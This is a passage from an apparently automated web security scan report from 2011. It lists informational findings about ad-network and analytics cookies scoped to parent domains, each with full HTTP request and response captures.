Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2097

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1295153"
...[SNIP]...

12.30. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1968

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

12.31. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:15:56 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1712

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...

12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A25%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone&r=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&cc=USD&c5=xss%20faq%20help%20contact%20phone&c20=New&v20=New&v24=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:25 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664231-3A57-2150C7DC"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www81
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845?AQB=1&ndh=1&t=6/8/2011%2015%3A58%3A5%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss&r=http%3A//www.oracle.com/openworld/tools/mobile/index.html&cc=USD&c5=xss&c20=New&v20=New&c24=no%20value&v24=http%3A//www.oracle.com/openworld/tools/mobile/index.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:58:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:58:06 GMT
Last-Modified: Wed, 07 Sep 2011 15:58:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66430E-6576-4E5300FE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www179
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499?AQB=1&ndh=1&t=6/8/2011%2015%3A56%3A13%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&v24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Results&pidt=1&oid=javascript%3AsearchDuplicateLink%281%2C10%2C482523%29%3B&ot=A&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:56:14 GMT
Last-Modified: Wed, 07 Sep 2011 15:56:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66429E-469A-637CA977"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www107
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A46%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&v24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Query&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:47 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:47 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:47 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664247-443F-7E91E57E"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A33%202%20300&pageName=Search%3A%20All%3A%20Query&g=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&r=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&cc=USD&c20=New&v20=New&c24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&v24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Error%3A404%3Ahttp%3A//www.oracle.com/us/sitemaps/sitemaps.html&pidt=1&oi